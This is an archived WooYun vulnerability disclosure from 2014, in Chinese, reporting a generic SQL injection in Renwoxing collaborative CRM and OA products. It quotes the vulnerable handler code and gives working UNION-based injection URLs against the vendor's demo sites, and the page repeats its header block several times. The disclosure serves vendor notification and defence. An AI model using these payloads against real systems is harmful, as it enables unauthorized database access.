任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081809

漏洞标题：任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

漏洞作者： wefgod

提交时间：2014-11-03 13:20

修复时间：2015-02-01 13:22

公开时间：2015-02-01 13:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-03：细节已通知厂商并且等待厂商处理中
2014-11-07：厂商已经确认，细节仅向厂商公开
2014-11-10：细节向第三方安全合作伙伴开放
2015-01-01：细节向核心白帽子及相关领域专家公开
2015-01-11：细节向普通白帽子公开
2015-01-21：细节向实习白帽子公开
2015-02-01：细节向公众公开

简要描述：

官网几个demo全部复现。

详细说明：

官网：
http://www.wecrm.com/
成都任我行信息技术有限公司
存在问题的系统是：
任我行协同CRM、任我行协同OA、任我行协同CRM 精华版
客户案例：
http://www.wecrm.com/static/consumer/

漏洞证明：

漏洞文件：
Handlers/WorkFlowDesignHandler.ashx

case "getformsbyids":
                {
                    WorkFlowManageDAL workFlowManageDAL = new WorkFlowManageDAL();
                    string text2 = context.Request["formIds"];  //参数可控
                    System.Data.DataTable dataTable = workFlowManageDAL.SelectFormListByIds(text2); //跟进去看
                    s = WFDesigner.GetFormsByIdsToXML(dataTable);
                    break;
                }

跟进SelectFormListByIds

public DataTable SelectFormListByIds(string ids)
{
    DataTable result;
    try
    {
        string commandText = "select ID,Name from CRM_CustomHtml where ID in(" + ids.ReplaceSqlInjectChar() + ")";  //此处仅过滤了单引号，可以轻松注入成功（因为完全可以不用单引号）
        result = this.DbInstance.ExecuteDataSet(CommandType.Text, commandText).Tables[0];
    }
……………………
}

直接看官方的几个demo吧：
任我行协同CRM：
http://show.wecrm.com/xt/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2) UNION ALL SELECT NULL,@@version--

任我行协同CRM精华版：
http://show.wecrm.com/jhb/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2) UNION ALL SELECT NULL,@@version--

任我行协同OA：
http://show.wecrm.com/oa/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2)--
http://show.wecrm.com/oa/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2) UNION ALL SELECT NULL,@@version--

解密密码：

修复方案：

过滤

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-11-07 14:42

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081809

漏洞标题：任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

相关厂商：成都任我行信息技术有限公司

漏洞作者： wefgod

提交时间：2014-11-03 13:20

修复时间：2015-02-01 13:22

公开时间：2015-02-01 13:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081809

漏洞标题：任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

相关厂商：成都任我行信息技术有限公司

漏洞作者： wefgod

提交时间：2014-11-03 13:20

修复时间：2015-02-01 13:22

公开时间：2015-02-01 13:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-081809"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：